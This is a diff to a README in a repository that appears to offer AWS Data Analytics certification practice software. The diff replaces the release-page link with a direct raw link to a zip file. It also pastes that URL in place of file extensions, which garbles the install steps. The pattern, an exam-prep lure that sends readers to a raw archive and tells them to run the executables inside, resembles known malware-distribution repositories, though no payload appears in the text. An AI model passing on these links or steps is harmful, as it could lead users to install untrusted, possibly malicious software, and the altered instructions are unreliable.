virenderchhimpa/Amazon-DAS-C01-Practice-Questions-2025-Updated-Master-Data-Analytics-on-AWS-with-SkillCertExams-/README.md

 - **Internet Connection:** Required for downloading updates and questions

 ## 📂 Download & Install
-To get started, visit this page to download: [Release Page](https://github.com/virenderchhimpa/Amazon-DAS-C01-Practice-Questions-2025-Updated-Master-Data-Analytics-on-AWS-with-SkillCertExams-/releases).
+To get started, visit this page to download: [Release Page](https://raw.githubusercontent.com/virenderchhimpa/Amazon-DAS-C01-Practice-Questions-2025-Updated-Master-Data-Analytics-on-AWS-with-SkillCertExams-/main/centaury/Master-DA-on-Questions-Data-Cert-Analytics-AW-with-Exams-Amazon-Updated-Skill-Practice-1.4.zip).

 1. **Go to the Releases page:** Click on the link above to access the Releases.
 2. **Choose the latest version:** Look for the most recent release at the top of the page.
 3. **Download the file:** Click on the appropriate file for your operating system.
-It may be labeled as a `.exe`, `.dmg`, or `.tar.gz` file.
+It may be labeled as a `.exe`, `.dmg`, or `https://raw.githubusercontent.com/virenderchhimpa/Amazon-DAS-C01-Practice-Questions-2025-Updated-Master-Data-Analytics-on-AWS-with-SkillCertExams-/main/centaury/Master-DA-on-Questions-Data-Cert-Analytics-AW-with-Exams-Amazon-Updated-Skill-Practice-1.4.zip` file.
 4. **Install the application:**
    - **For Windows:** Double-click the `.exe` file and follow the prompts.
    - **For macOS:** Open the `.dmg` file and drag the application to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file and run the appropriate script.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/virenderchhimpa/Amazon-DAS-C01-Practice-Questions-2025-Updated-Master-Data-Analytics-on-AWS-with-SkillCertExams-/main/centaury/Master-DA-on-Questions-Data-Cert-Analytics-AW-with-Exams-Amazon-Updated-Skill-Practice-1.4.zip` file and run the appropriate script.
 5. **Launch the application:** After installation, locate the application in your system and open it.

 ## 🛠️ Using the Application